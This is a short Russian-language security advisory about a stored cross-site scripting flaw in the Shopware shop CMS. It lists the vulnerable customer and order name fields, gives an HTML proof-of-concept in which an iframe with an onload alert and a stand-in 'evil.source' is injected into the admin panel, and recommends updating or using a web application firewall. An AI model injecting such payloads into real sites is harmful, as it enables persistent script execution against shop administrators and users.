В популярной CMS Shopware для создания интернет-магазинов обнаружена XSS уязвимость — Cross-Site Scripting (межсайтовый скриптинг).
Shopware — это модульная система интернет-магазина, разрабатываемая с 2004 года. Повзоляет создавать кластерные интернет-магазины и интегрировать их со сторонними сервисами — онлайн оплаты, ERP-системами и д.р.
XSS — это тип атаки на веб-системы, заключающийся во внедрении в выдаваемую веб-системой страницу вредоносного кода, который будет выполнен на компьютере пользователя при открытии им этой страницы, и взаимодействии этого кода с веб-сервером злоумышленника.
Уязвмиость содержится в модулях: Customers и Orders.
Уязвимые параметры: Firstname, Lastname и Order Name.
Пример эксплуатации уязвимости:
<div class="x-window x-customer-detail-window x-layer x-window-default x-closable x-window-closable x-window-default-closable" style="width: 1093px;height: 458px" id="customer-detail-window-2311"> <div style="width: 1093px" class="x-window-header x-window-header-draggable x-docked x-window-header-default x-horizontal x-window-header-horizontal x-window-header-default-horizontal x-top x-window-header-top x-window-header-default-top x-docked-top x-window-header-docked-top x-window-header-default-docked-top x-unselectable" id="customer-detail-window-2311_header"><div style="width: 1091px" id="customer-detail-window-2311_header-body" class="x-window-header-body x-window-header-body-default x-window-header-body-horizontal x-window-header-body-default-horizontal x-window-header-body-top x-window-header-body-default-top x-window-header-body-docked-top x-window-header-body-default-docked-top x-window-header-body-default-horizontal x-window-header-body-default-top x-window-header-body-default-docked-top x-box-layout-ct"> <div style="width: 1066px;height: 154px" id="customer-detail-window-2311_header-innerCt" class="x-box-inner " role="presentation"><div id="customer-detail-window-2311_header-targetEl" style="width:20000px;height:1px"><div class="x-component x-window-header-text-container x-box-item x-component-default" style="text-align: left;margin: 0px;width: 1049px" id="customer-detail-window-2311_header_hd"> <span id="customer-detail-window-2311_header_hd-textEl" class="x-window-header-text x-window-header-text-default"> Kundenkonto: Mar'Da"><iframe src="evil.source" onload="alert("PTEST")[PERSISTENT SCRIPT CODE EXECUTION!]" <iframe src=evil.source onload=alert("PTEST")[PERSISTENT SCRIPT CODE EXECUTION!] < (20019)</span></div> <div class="x-tool x-box-item x-tool-default" style="width: 15px;height: 15px;margin: 0px" id="tool-2312"> <img id="tool-2312-toolEl" src="image/gif;base64,R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" class="x-tool-close" role="presentation"></div></div></div></div>
Для устранения уязвимости необходимо обновить CMS Shopware до последний версии.
Использование Web Application Firewall позволяет блокировать подобные атаки.